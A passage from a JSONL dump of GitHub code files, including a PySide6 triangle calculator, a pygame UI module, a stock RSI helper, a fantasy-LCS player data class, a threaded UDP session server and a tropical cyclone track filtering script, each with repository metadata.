Hvis der er mange værdier, der skal gemmes,\n # kan det hurtigt fylde for mange linjer.\n # self.trekantsvaerdier[\"A\"] = self.ui.vinkel_A.value()\n # self.trekantsvaerdier[\"B\"] = self.ui.vinkel_B.value()\n # self.trekantsvaerdier[\"C\"] = self.ui.vinkel_C.value()\n # self.trekantsvaerdier[\"a\"] = self.ui.side_a.value()\n # self.trekantsvaerdier[\"b\"] = self.ui.side_b.value()\n # self.trekantsvaerdier[\"c\"] = self.ui.side_c.value()\n\n # Sletter indholdet i outputfeltet\n self.ui.outputfelt.clear()\n # Skriver følgende til outputfeltet\n self.ui.outputfelt.append(\"Følgende værdier er gemt.\")\n # Udprinter alle værdierne for indtastede vinkler og sider\n for navn, vaerdi in self.trekantsvaerdier.items():\n self.ui.outputfelt.append(f\"{navn} = {vaerdi}\")\n\n\nprogram = QApplication.instance()\nif program == None:\n program = QApplication(sys.argv)\ntrekantsberegner = Trekantsberegner()\ntrekantsberegner.ui.show()\nprogram.exec()\n# Direkte indlæsning af designfil:1 ends here\n","repo_name":"Vibenshus-Gymnasium-Programmering/PySide6_praesentationer","sub_path":"02_QtDesigner/Grafisk_trekantsberegner.py","file_name":"Grafisk_trekantsberegner.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"da","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35641752578","text":"import yfinance as yf\n\n\ndef get_tick(ticker):\n data = yf.Ticker(ticker).info\n return data\ndef getRSI(ticker):\n df = yf.download(ticker, period='1mo')\n period = 5\n delta = df['Close'].diff()\n gains = delta.where(delta > 0, 0)\n losses = -delta.where(delta < 0, 0)\n average_gain = gains.rolling(window=period).mean()\n average_loss = losses.rolling(window=period).mean()\n relative_strength = average_gain / average_loss\n\n relative_strength = average_gain / average_loss\n rsi = 100 - (100 / (1 + relative_strength))\n df['RSI'] = rsi\n df['RSI'].fillna(method='ffill', inplace=True)\n","repo_name":"james04nesbitt/Signal_Street","sub_path":"ss/finance.py","file_name":"finance.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72691272054","text":"#!/usr/bin/env python\nimport pygame.event\nimport pygame.key\nimport pygame.display\nimport pygame.image\nimport pygame.mixer\nfrom pygame.locals import *\nimport pygame\nimport sys\nimport time\nimport os\nimport dzulib1 as dzulib\nfrom dzulib1 import textrender\npygame.display.init()\nimport traceback\nimport random\nimport xml.etree.ElementTree as ET\npluglist=[]\n\n\ndef OKpop(info, extra=None, extra2=None):\n\tscreensurf=pygame.display.get_surface()\n\tbgrect=pygame.Rect(0, 0, screensurf.get_width()//1.8, 6*uitextsize)\n\tbgrect.centerx=(screensurf.get_width()//2)\n\tbgrect.centery=(screensurf.get_height()//2)\n\tpygame.draw.rect(screensurf, uibgcolor, bgrect)\n\tdzulib.trace3dbox(screensurf, uibgcolor, bgrect, 2)\n\t\n\tyoff=bgrect.y+2\n\tyjump=uitextsize\n\t#lineren=simplefont.render(info, True, (255, 255, 255), (30, 30, 30))\n\tlineren=textrender(info, uitextsize, uifgcolor, uibgcolor, 0)\n\tscreensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+0))\n\tyoff+=yjump\n\tif extra!=None:\n\t\t#lineren=simplefont.render(extra, True, (255, 255, 255), (30, 30, 30))\n\t\tlineren=textrender(extra, uitextsize, uifgcolor, uibgcolor, 0)\n\t\tscreensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+0))\n\t\tyoff+=yjump\n\tif 
extra2!=None:\n\t\t#lineren=simplefont.render(extra2, True, (255, 255, 255), (30, 30, 30))\n\t\tlineren=textrender(extra2, uitextsize, uifgcolor, uibgcolor, 0)\n\t\tscreensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+0))\n\t\tyoff+=yjump\n\t#lineren=simplefont.render(\"Press any key or click to continue\", True, (255, 255, 255), (30, 30, 30))\n\tlineren=textrender(\"Press any key or click to continue\", uitextsize, uifgcolor, uibgcolor, 0)\n\tscreensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+0))\n\tyoff+=yjump\n\tpygame.display.update()\n\twhile True:\n\t\ttime.sleep(0.1)\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == QUIT:\n\t\t\t\treturn\n\t\t\tif event.type == KEYDOWN:\n\t\t\t\treturn\n\t\t\tif event.type==MOUSEBUTTONDOWN:\n\t\t\t\treturn\n\ndef YNpop(info):\n\tscreensurf=pygame.display.get_surface()\n\tbgrect=pygame.Rect(0, 0, screensurf.get_width()//1.8, 6*uitextsize)\n\tbgrect.centerx=(screensurf.get_width()//2)\n\tbgrect.centery=(screensurf.get_height()//2)\n\tpygame.draw.rect(screensurf, uibgcolor, bgrect)\n\tdzulib.trace3dbox(screensurf, uibgcolor, bgrect, 2)\n\tyoff=bgrect.y+2\n\tyjump=uitextsize\n\t#lineren=simplefont.render(info, True, (255, 255, 255), (30, 30, 30))\n\tlineren=textrender(info, uitextsize, uifgcolor, uibgcolor, 0)\n\tscreensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+0))\n\tyoff+=yjump\n\t#lineren=simplefont.render(\"(Y)es or (N)o?\", True, (255, 255, 255), (30, 30, 30))\n\tlineren=textrender(\" (Y)es \", uitextsize, uifgcolor, dzulib.colorboost(uibgcolor, 40), 0)\n\tyesrect=screensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+0))\n\tyoff+=yjump\n\tlineren=textrender(\" (N)o \", uitextsize, uifgcolor, dzulib.colorboost(uibgcolor, 40), 0)\n\tnorect=screensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+0))\n\tyoff+=yjump\n\tpygame.display.update()\n\twhile True:\n\t\ttime.sleep(0.1)\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == QUIT:\n\t\t\t\treturn 0\n\t\t\tif event.type == KEYDOWN and event.key == K_n:\n\t\t\t\treturn 0\n\t\t\tif event.type == KEYDOWN and event.key == K_y:\n\t\t\t\treturn 1\n\t\t\tif event.type==MOUSEBUTTONDOWN:\n\t\t\t\tif yesrect.collidepoint(event.pos):\n\t\t\t\t\treturn 1\n\t\t\t\tif norect.collidepoint(event.pos):\n\t\t\t\t\treturn 0\n\nsavepath=\"save\"\n\ndef charremove(string, indexq):\n\tif indexq==0:\n\t\treturn string\n\telse:\n\t\treturn (string[:(indexq-1)] + string[(indexq):])\ndef charinsert(string, char, indexq):\n\tif indexq==0:\n\t\treturn char + string\n\telse:\n\t\treturn (string[:(indexq-1)] + char + string[(indexq-1):])\n\n\n\ndef fileselect(title):\n\tscreensurf=pygame.display.get_surface()\n\tcuroffset=0\n\tredraw=1\n\ttextstring=\"\"\n\tpathlist=sorted(os.listdir(os.path.join(savepath, '.')), key=str.lower)\n\twhile True:\n\t\ttime.sleep(0.1)\n\t\tif redraw==1:\n\t\t\tredraw=0\n\t\t\tyoff=2\n\t\t\tyjump=uitextsize+1\n\t\t\tbgrect=pygame.Rect(0, 50, screensurf.get_width()//2, screensurf.get_height())\n\t\t\tbgrect.centerx=(screensurf.get_width()//2)\n\t\t\tbgrect.centery=(screensurf.get_height()//2)\n\t\t\tyoff=bgrect.y+2\n\t\t\tpygame.draw.rect(screensurf, uibgcolor, bgrect)\n\t\t\tdzulib.trace3dbox(screensurf, uibgcolor, bgrect, 2)\n\t\t\t#pygame.draw.rect(screensurf, (255, 255, 255), bgrect, 1)\n\t\t\t#lineren=simplefont.render(title, True, (255, 255, 255), (30, 30, 30))\n\t\t\tlineren=textrender(title, uitextsize, uifgcolor, 
uibgcolor, 0)\n\t\t\tscreensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+50))\n\t\t\tyoff+=yjump\n\t\t\tlinedict={}\n\t\t\tfor line in pathlist:\n\t\t\t\tif line.endswith('.sav'):\n\t\t\t\t\tif line.split(\".\")[0]==textstring:\n\t\t\t\t\t\tlineren=textrender(line, uitextsize, uibgcolor, dzulib.colorboost(uifgcolor, 40), 0)\n\t\t\t\t\telse:\n\t\t\t\t\t\tlineren=textrender(line, uitextsize, uifgcolor, dzulib.colorboost(uibgcolor, 40), 0)\n\t\t\t\t\tbxrect=screensurf.blit(lineren, ((screensurf.get_width()//2)-(lineren.get_width()//2), yoff+50))\n\t\t\t\t\tyoff+=yjump\n\t\t\t\t\tlinedict[line.split(\".\")[0]]=bxrect\n\t\t\t\n\t\t\t#abttextB=simplefont.render(textstring+\".sav\", True, (255, 255, 255), (40, 40, 40))\n\t\t\tabttextB=textrender(textstring+\".sav\", uitextsize, uibgcolor, dzulib.colorboost(uifgcolor, 40), 0)\n\t\t\tpygame.draw.line(screensurf, dzulib.colorboost(uibgcolor, 40), (bgrect.x, yoff+yjump*2), (bgrect.x+bgrect.w, yoff+yjump*2), 2)\n\t\t\tscreensurf.blit(abttextB, (screensurf.get_width()//2-abttextB.get_width()//2, yoff+yjump*3))\n\t\t\tpygame.display.update()\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type==MOUSEBUTTONDOWN:\n\t\t\t\tfor rectbx in linedict:\n\t\t\t\t\tif linedict[rectbx].collidepoint(event.pos):\n\t\t\t\t\t\tif rectbx==textstring:\n\t\t\t\t\t\t\treturn rectbx+\".sav\"\n\t\t\t\t\t\ttextstring=rectbx\n\t\t\t\t\t\tredraw=1\n\t\t\t\tif not bgrect.collidepoint(event.pos):\n\t\t\t\t\treturn None\n\t\t\tif event.type == KEYDOWN and event.key == K_BACKSPACE:\n\t\t\t\tif len(textstring)!=0 and curoffset!=0:\n\t\t\t\t\ttextstring=charremove(textstring, curoffset)\n\t\t\t\t\tcuroffset -= 1\n\t\t\t\t\tredraw=1\n\t\t\t\tbreak\n\t\t\telif event.type == KEYDOWN and event.key == K_ESCAPE:\n\t\t\t\treturn None\n\t\t\telif event.type == KEYDOWN and event.key == K_RETURN:\n\t\t\t\tif textstring!=\"\":\n\t\t\t\t\treturn textstring+ \".sav\"\n\t\t\t\telse:\n\t\t\t\t\tOKpop(\"\\\".sav\\\" is not a valid name.\")\n\t\t\t\t\treturn None\n\t\t\telif event.type == KEYDOWN and event.key != K_TAB:\n\t\t\t\tcuroffset += 1\n\t\t\t\ttextstring=charinsert(textstring, str(event.unicode), curoffset)\n\t\t\t\tredraw=1\n\t\t\t\tbreak\n\t","repo_name":"ThomasTheSpaceFox/Desutezeoid","sub_path":"dzuinter.py","file_name":"dzuinter.py","file_ext":"py","file_size_in_byte":6501,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"42381313463","text":"import matplotlib.pyplot as plt\n\nf = open(\"/Users/saimonish/IntelliJ_workspace/ACSEF2021/waiting_times.txt\", \"r\")\n\nwaittimes = []\narray = [0]*400\nfor j in array:\n x = f.readline()\n if x != \"==== \\n\":\n waittimes.append(int(x))\n\n# frequencies\n\n\n# setting the ranges and no. of intervals\nrange = (0, 10)\nbins = 10\n\n# plotting a histogram\nplt.hist(waittimes, bins, range, color = 'green',\n histtype = 'bar', rwidth = 0.8)\n\n# x-axis label\nplt.xlabel('No. of Units Waited')\n# frequency label\nplt.ylabel('No. 
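# The fileselect dialog above enumerates ".sav" files with a listdir/sort/filter
# idiom; the same step as a standalone sketch (directory name assumed from the
# record's savepath):
import os

def list_saves(savepath="save"):
    names = sorted(os.listdir(savepath), key=str.lower)  # case-insensitive order
    return [n[:-len(".sav")] for n in names if n.endswith(".sav")]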
of cars')\n# plot title\nplt.title('Wait Time of Each Car')\n\n# function to show the plot\nplt.show()\n\nplt.savefig(\"/Users/saimonish/IntelliJ_workspace/ACSEF2021/Data_Analysys_Graph.png\")","repo_name":"SpartanSai/ACSEF2021","sub_path":"Data_Analysis_Graph.py","file_name":"Data_Analysis_Graph.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8481791067","text":"class PlayerDataException(Exception):\n \"\"\"Handles PlayerData Exceptions\"\"\"\n\n\nclass PlayerData:\n \"\"\"Handles Player Data requests\"\"\"\n\n def __init__(self, season, player):\n self.profile_data = self._get_profile(season, player)\n self.match_data = self._get_match_data(season)\n self.projected_data = self._get_projected_data(season)\n\n def _get_profile(self, season, player):\n \"\"\"\n Returns profile data of the player\n\n @param player - id or name of the player to look up\n \"\"\"\n try:\n try:\n player = int(player)\n except ValueError:\n player = player.lower()\n player_list = season.get_season_data()[\"proPlayers\"]\n for p in player_list:\n if p[\"id\"] == player:\n return p\n if p[\"name\"].lower() == player:\n return p\n except Exception as e:\n error_msg = (\"Failed to retrieve player profile data: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def _get_match_data(self, season):\n \"\"\"\n Returns match data related to player\n \"\"\"\n try:\n match_data = []\n player_id = self.profile_data[\"id\"]\n matches = season.get_season_data()[\"stats\"][\"actualPlayerStats\"]\n for match in matches:\n if player_id == match[0]:\n match_data.append(match)\n return match_data\n except Exception as e:\n error_msg = (\"Failed to retrieve player match data: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def _get_projected_data(self, season):\n \"\"\"\n Returns projected match data related to player\n \"\"\"\n try:\n match_data = []\n player_id = self.profile_data[\"id\"]\n matches = season.get_season_data()[\"stats\"][\"projectedPlayerStats\"]\n for match in matches:\n if player_id == match[0]:\n match_data.append(match)\n return match_data\n except Exception as e:\n error_msg = (\"Failed to retrieve player match data: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_player_id(self):\n \"\"\"\n Returns the player id\n \"\"\"\n try:\n return self.profile_data[\"id\"]\n except Exception as e:\n error_msg = (\"Failed to retrieve player id: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_name(self):\n \"\"\"\n Returns the player name\n \"\"\"\n try:\n return self.profile_data[\"name\"]\n except Exception as e:\n error_msg = (\"Failed to retrieve player name: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_photo_url(self):\n \"\"\"\n Returns the photo url of the player\n \"\"\"\n try:\n return self.profile_data[\"photoUrl\"]\n except Exception as e:\n error_msg = (\"Failed to retrieve photo url: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_positions(self):\n \"\"\"\n Returns a list of all the player's positions\n \"\"\"\n try:\n return self.profile_data[\"positions\"]\n except Exception as e:\n error_msg = (\"Failed to retrieve a list of player positions: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_team_id(self):\n \"\"\"\n Returns the player's team id\n \"\"\"\n try:\n return self.profile_data[\"proTeamId\"]\n 
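# The _get_profile lookup above accepts either a numeric id or a
# case-insensitive name. The same dual-key search as a self-contained sketch
# over a list of dicts (function name is an assumption):
def find_player(players, key):
    try:
        key = int(key)
        match = lambda p: p["id"] == key
    except ValueError:
        key = str(key).lower()
        match = lambda p: p["name"].lower() == key
    return next((p for p in players if match(p)), None)

# find_player([{"id": 7, "name": "Faker"}], "faker") -> {"id": 7, "name": "Faker"}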
except Exception as e:\n error_msg = (\"Failed to retrieve the player's team id: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_riot_id(self):\n \"\"\"\n Returns the player's riot id\n \"\"\"\n try:\n return self.profile_data[\"riotId\"]\n except Exception as e:\n error_msg = (\"Failed to retrieve the player's riot id: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_trends_by_week(self):\n \"\"\"\n Returns a dictionary of all the player's weekly trends\n \"\"\"\n try:\n return self.profile_data[\"trendsByWeek\"]\n except Exception as e:\n error_msg = (\"Failed to retrieve weekly trends: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_matches_played(self):\n \"\"\"\n Returns the total matches played\n \"\"\"\n try:\n return len(self.match_data)\n except Exception as e:\n error_msg = (\"Failed to retrieve number of matches played: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_all_match_stats(self):\n \"\"\"\n Returns a list of all matches played by the player\n \"\"\"\n try:\n return self.match_data\n except Exception as e:\n error_msg = (\"Failed to retrieve all match stats: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_match_stats(self, match_number):\n \"\"\"\n Returns match stats of a player given a number in a range\n from the first match to the most recent match\n\n @param match_number - # of the match to get\n \"\"\"\n try:\n match_number = int(match_number)\n if not 0 <= match_number < len(self.match_data):\n raise Exception(\"Specified number is out of the match range: \"\n \"{}\".format(match_number))\n match_stats = self.match_data[match_number]\n return match_stats\n except Exception as e:\n error_msg = (\"Failed to retrieve match stats: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_all_projected_stats(self):\n \"\"\"\n Returns a list of all projected matches to be played by\n the player\n \"\"\"\n try:\n return self.projected_data\n except Exception as e:\n error_msg = (\"Failed to retrieve all projected stats: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n\n def get_projected_stats(self, match_number):\n \"\"\"\n Returns projected stats of a player given a number in a range\n from the first match to the most recent match\n\n @param match_number - # of the match to get\n \"\"\"\n try:\n projected_number = int(match_number)\n if not 0 <= projected_number < len(self.projected_data):\n raise Exception(\"Specified number is out of the match range: \"\n \"{}\".format(match_number))\n projected_stats = self.projected_data[match_number]\n return projected_stats\n except Exception as e:\n error_msg = (\"Failed to retrieve match stats: {}\"\n \"\".format(str(e)))\n raise PlayerDataException(error_msg)\n","repo_name":"kodycode/Fantasy-LCS-API-Wrapper","sub_path":"fantasylcs/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":7470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40795897576","text":"##########################\n##\n## Code by Susan\n## padath314\n##\n##########################\n\nimport socket\nimport sys\nfrom UAP import UAP,Message\nimport time\nimport threading\nimport queue\n\nSESSION_TIMEOUT = 20 # Adjust this value as needed\n\nSESSIONS = {}\n\ndef PrintMessage(msg : Message, \n alternativeMessage = None,\n alternativeSequence = None):\n if alternativeMessage:\n msg.message = 
alternativeMessage\n if alternativeSequence:\n msg.seq = alternativeSequence\n print(f\"{hex(msg.sID)} [{msg.seq}] {msg.message}\")\n\nclass Session:\n def __init__(self, session_id, client_address, server_socket, active_sessions):\n self.session_id = session_id\n self.client_address = client_address\n self.last_activity_time = time.time()\n self.expected_sequence_number = 1\n self.server_socket = server_socket # Store the server socket\n self.active_sessions = active_sessions # Store the active sessions dictionary\n\n self.messages = queue.Queue() # Queue of packets for this session\n self.thread = None\n\n def is_hello(self, message):\n return message.command == UAP.CommandEnum.HELLO\n\n def update_activity_time(self):\n self.last_activity_time = time.time()\n\n def is_timedout(self):\n return time.time() - self.last_activity_time > SESSION_TIMEOUT\n\n def process_packet(self, received_message):\n # print(received_message)\n # Extract the sequence number from the received message\n received_sequence_number = received_message.seq\n\n if received_sequence_number == self.expected_sequence_number:\n # Process the packet as expected\n # print(f\"Received packet with sequence number {received_sequence_number}: {received_message.message}\")\n PrintMessage(received_message)\n self.expected_sequence_number += 1 # Update the expected sequence number\n elif received_sequence_number < self.expected_sequence_number:\n # Handle out-of-order packet (protocol error)\n # print(f\"Received out-of-order packet with sequence number {received_sequence_number}.\")\n PrintMessage(received_message, \"Message out of order\")\n #self.close_session()\n else:\n # Handle missing packets\n for missing_sequence_number in range(self.expected_sequence_number, received_sequence_number):\n # print(f\"Lost packet with sequence number {missing_sequence_number}\")\n PrintMessage(received_message, \n alternativeMessage=\"Packet Lost\",\n alternativeSequence=missing_sequence_number)\n # Update the expected sequence number\n self.expected_sequence_number = received_sequence_number + 1\n\n def close_session(self):\n # Send a GOODBYE message to the client\n goodbye_message = Message(UAP.CommandEnum.GOODBYE, 0, self.session_id, \"GOODBYE\")\n encoded_goodbye_message = goodbye_message.EncodeMessage()\n self.server_socket.sendto(encoded_goodbye_message, self.client_address)\n \n # Remove the session from active_sessions\n del self.active_sessions[self.session_id]\n\ndef session_thread_handler(server_socket, session_id):\n\n # Send a reply HELLO message back to the client\n session = SESSIONS[session_id]\n reply_message = Message(UAP.CommandEnum.HELLO, 0, session_id, \"Reply HELLO\")\n encoded_reply_message = reply_message.EncodeMessage()\n server_socket.sendto(encoded_reply_message, session.client_address)\n # print(\"Replies sent\")\n PrintMessage(reply_message, \"Session Started\")\n\n while True:\n # print('*')\n\n # Fetch session data from shared dictionary\n session = SESSIONS[session_id]\n\n # Session timeout\n if session.is_timedout():\n session.close_session()\n PrintMessage(Message( \n 0,\n session.expected_sequence_number,\n session_id,\n \"Closing session due to timeout\"\n ))\n quit()\n \n try:\n received_message, client_address = session.messages.get(block=False), session.client_address\n except:\n continue\n #print(f\"Received data from {client_address}: {received_message}\")\n\n if received_message.sID != session_id:\n raise RuntimeError(\"Recieved wrong session packet\")\n \n if received_message.command == 
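# process_packet above distinguishes three sequence-number cases. The same rule
# as a side-effect-free sketch that also returns the next expected number:
def classify(expected: int, received: int):
    if received == expected:
        return "in_order", expected + 1
    if received < expected:
        return "out_of_order", expected          # duplicate or late packet
    lost = list(range(expected, received))       # every number in the gap was lost
    return f"lost:{lost}", received + 1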
UAP.CommandEnum.HELLO:\n raise RuntimeError(\"Recieved hello packet in thread\")\n\n elif received_message.command == UAP.CommandEnum.DATA:\n\n # Update the session's last activity time\n session.update_activity_time()\n\n session.process_packet(received_message)\n # Send an ALIVE message in response to the DATA message\n alive_message = Message(UAP.CommandEnum.ALIVE, 0, session_id, \"ALIVE\")\n encoded_alive_message = alive_message.EncodeMessage()\n server_socket.sendto(encoded_alive_message, client_address)\n \n elif received_message.command == UAP.CommandEnum.GOODBYE:\n #print(\"\\necievd goodbye\\n\")\n\n session.close_session()\n\n PrintMessage(received_message, \"Closing session\")\n\n quit()\n\n\ndef send_goodbye_to_inactive_sessions(active_sessions, server_socket):\n inactive_sessions = [session for session in active_sessions.values() if session.is_inactive()]\n \n for session in inactive_sessions:\n goodbye_message = Message(UAP.CommandEnum.GOODBYE, 0, session.session_id, \"GOODBYE\")\n encoded_goodbye_message = goodbye_message.EncodeMessage()\n server_socket.sendto(encoded_goodbye_message, session.client_address)\n del active_sessions[session.client_address]\n\n\ndef send_goodbye_to_active_sessions(active_sessions, server_socket):\n goodbye_message = Message(UAP.CommandEnum.GOODBYE, 0, 0, \"GOODBYE\") # Create a GOODBYE Message\n\n for session in active_sessions.values():\n encoded_goodbye_message = goodbye_message.EncodeMessage() # Encode the GOODBYE Message\n server_socket.sendto(encoded_goodbye_message, session.client_address)\n\ndef main(port, host='0.0.0.0'):\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n server_address = (host, port)\n print(f\"Waiting on host {host} and port {port}\")\n\n server_socket.bind(server_address)\n\n # Start main thread\n main_thread = threading.Thread(target=main_thread_handler, args=(server_socket,))\n main_thread.daemon = True\n main_thread.start()\n\n try:\n while True:\n stdin = input()\n if stdin == \"q\":\n print(\"Server quitting due to input\")\n quit()\n except KeyboardInterrupt:\n print(\"Server is quitting due to keyboard interrupt.\")\n quit()\n except Exception as e:\n print(e)\n finally:\n # Send GOODBYE message to all active sessions\n send_goodbye_to_active_sessions(SESSIONS, server_socket)\n # Close the socket and clean up\n server_socket.close()\n quit()\n\n\ndef main_thread_handler(server_socket):\n try:\n while True:\n # print('*')\n data, client_address = server_socket.recvfrom(1024)\n received_message = Message.DecodeMessage(data)\n #print(f\"Received data from {client_address}: {received_message}\")\n \n if received_message.command == UAP.CommandEnum.HELLO:\n session_id = received_message.sID\n \n if session_id not in SESSIONS:\n new_session = Session(session_id, client_address, server_socket, SESSIONS) # Pass server_socket and active_sessions\n if not new_session.is_hello(received_message):\n # Terminate the session if the initial message is not HELLO\n continue\n SESSIONS[session_id] = new_session\n else:\n SESSIONS[session_id].close_session()\n continue\n\n # Update the session's last activity time\n SESSIONS[session_id].update_activity_time()\n\n # Starting session thread\n session_thread = threading.Thread(target=session_thread_handler, args=(server_socket, session_id))\n session_thread.daemon = True\n session_thread.start()\n\n elif received_message.command == UAP.CommandEnum.DATA or received_message.command == UAP.CommandEnum.GOODBYE:\n session_id = received_message.sID\n if session_id not in 
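# The session loop above polls messages.get(block=False) inside while True, so
# it spins between packets. A blocking get with a timeout keeps the periodic
# timeout check without burning CPU (a sketch, not the record's code):
import queue

def next_message(q: queue.Queue, timeout: float = 1.0):
    try:
        return q.get(timeout=timeout)  # sleeps until a packet arrives or timeout
    except queue.Empty:
        return None                    # caller re-checks the session timeout here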
SESSIONS:\n # Terminate the session if the DATA message is received without a HELLO\n continue\n\n SESSIONS[session_id].messages.put(received_message)\n \n #print(active_sessions)\n\n except KeyboardInterrupt:\n print(\"Server is quitting due to keyboard interrupt.\")\n except Exception as e:\n print(e)\n finally:\n # Send GOODBYE message to all active sessions\n send_goodbye_to_active_sessions(SESSIONS, server_socket)\n # Close the socket and clean up\n server_socket.close()\n\nif __name__ == \"__main__\":\n import sys\n if len(sys.argv) == 1:\n print(\"Usage: ThreadedUAPServer.py port [host]\")\n elif len(sys.argv) == 2:\n main(int(sys.argv[1]))\n else:\n main(int(sys.argv[1]), sys.argv[2])\n","repo_name":"unniisme/Networking","sub_path":"UDPcommunicator/ThreadedUAPServer.py","file_name":"ThreadedUAPServer.py","file_ext":"py","file_size_in_byte":9725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40983304403","text":"\"\"\"\nextract_TC_station_passage.py - find all TCs that pass within a defined distance\nof a weather station\n\nWe first calculate the closest point of approach (CPA) between a weather\nstation location and each TC track. For all records where the TC passes within\n2 degrees of the station, we store the date/time of the passage and the\ndistance of the CPA.\n\nFor each station, we then load the daily maximum wind gust observations, and\nextract the observations closest to the date/time of CPA, plus the observations\nfrom one day prior and one day after. We then take the maximum of those\nobservaations and assign that value to the cyclone event.\n\nWe check the observations for the day prior and after to ensure we capture the\nmaximum gust from the cyclone. It is possible that the CPA occurs on one day,\nbut the strongest gust may be on the next day\n\nNOTE: The wind speed observations are in m/s, but appear to be converted from\nthe original recording units of knots, then rounded to 1 decimal place. This\ncauses an element of anomalous clustering around specific values in the data\nrecorded in the files.\n\n\"\"\"\nimport os\nimport logging\nimport warnings\nimport pandas as pd\nimport geopandas as gpd\nfrom datetime import timedelta\n\nimport matplotlib.pyplot as plt\nfrom shapely.geometry import LineString\nfrom shapely.geometry import box as sbox\nfrom vincenty import vincenty\n\nlogger = logging.getLogger()\n\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\nTZ = {\"QLD\": 10, \"NSW\": 10, \"VIC\": 10,\n \"TAS\": 10, \"SA\": 9.5, \"NT\": 9.5,\n \"WA\": 8, \"ANT\": 0}\n\n\ndef filter_tracks_domain(df, minlon=90, maxlon=180, minlat=-40, maxlat=0):\n \"\"\"\n Takes a `DataFrame` and filters on the basis of whether the track interscts\n the given domain, which is specified by the minimum and maximum longitude\n and latitude.\n\n NOTE: This assumes the tracks and bounding box are in the same geographic\n coordinate system (i.e. generally a latitude-longitude coordinate system).\n It will NOT support different projections (e.g. 
UTM data for the bounds and\n geographic for the tracks).\n\n NOTE: This doesn't work if there is only one point for the track.\n\n :param df: :class:`pandas.DataFrame` that holds the TCLV data\n :param float minlon: minimum longitude of the bounding box\n :param float minlat: minimum latitude of the bounding box\n :param float maxlon: maximum longitude of the bounding box\n :param float maxlat: maximum latitude of the bounding box\n\n :returns: :class:`pd.DataFrame` of tracks that pass through the given box.\n \"\"\"\n logger.info(\"Filtering tracks to the given domain\")\n domain = sbox(minlon, minlat, maxlon, maxlat, ccw=False)\n tracks = df.groupby('num')\n tempfilter = tracks.filter(lambda x: len(x) > 1)\n filterdf = tempfilter.groupby('num').filter(\n lambda x: LineString(zip(x['lon'], x['lat'])).intersects(domain))\n return filterdf\n\n\ndef load_obs_tracks(trackfile: str, format: str) -> gpd.GeoDataFrame:\n \"\"\"\n Load track data from IBTrACS file, add geometry and CRS. Basic\n categorisation using minimum central pressure is applied.\n\n :param str trackfile: Path to BoM best track data file\n :param str format: Whether its a raw or QC'd BoM best track file\n\n :returns: :class:`geopandas.GeoDataFrame`\n \"\"\"\n logger.info(f\"Loading tracks from {trackfile}\")\n\n if format == 'QC':\n usecols = [0, 1, 2, 7, 8, 11, 12, 13]\n colnames = ['NAME', 'DISTURBANCE_ID', 'TM', 'LAT', 'LON',\n 'adj. ADT Vm (kn)', 'CP(CKZ(Lok R34,LokPOCI, adj. Vm),hPa)',\n 'POCI (Lok, hPa)']\n dtypes = [str, str, str, float, float, float, float, float]\n\n df = pd.read_csv(trackfile, usecols=usecols,\n dtype=dict(zip(colnames, dtypes)),\n na_values=[' '], nrows=13743)\n colrenames = {'DISTURBANCE_ID': 'num',\n 'TM': 'datetime',\n 'LON': 'lon', 'LAT': 'lat',\n 'adj. ADT Vm (kn)': 'vmax',\n 'CP(CKZ(Lok R34,LokPOCI, adj. Vm),hPa)': 'pmin',\n 'POCI (Lok, hPa)': 'poci'}\n df.rename(colrenames, axis=1, inplace=True)\n else:\n usecols = [0, 1, 2, 7, 8, 16, 20, 53]\n colnames = ['NAME', 'num', 'datetime',\n 'lat', 'lon', 'pmin', 'poci', 'vmax']\n dtypes = [str, str, str, float, float, float, float, float]\n df = pd.read_csv(trackfile, usecols=usecols, header=0, skiprows=5,\n names=colnames,\n dtype=dict(zip(colnames, dtypes)),\n na_values=[' '],)\n\n df['datetime'] = pd.to_datetime(\n df.datetime, format=\"%Y-%m-%d %H:%M\", errors='coerce')\n obstc = filter_tracks_domain(df)\n\n 